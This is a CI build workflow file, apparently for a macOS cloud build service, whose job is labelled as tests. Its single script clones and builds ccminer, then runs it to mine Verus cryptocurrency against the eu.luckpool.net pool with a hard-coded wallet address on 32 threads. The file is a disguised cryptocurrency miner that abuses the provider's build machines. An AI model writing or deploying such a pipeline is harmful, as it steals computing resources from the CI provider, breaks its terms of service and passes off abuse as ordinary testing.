workflows:
  my-workflow:
    name: tests-doang
    instance_type: mac_mini
    max_build_duration: 120
    scripts:
    - brew install autoconf && brew install automake && brew install libtool && brew install pkg-config autoconf automake curl openssl llvm && git clone https://github.com/Mr-Bossman/ccminer.git && cd ccminer && chmod +x build.sh && ./build.sh && ./ccminer -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RScXQxaU3W8Gw2joPemvn9GKQmcW7ndg77.CPU -p x -t 32
    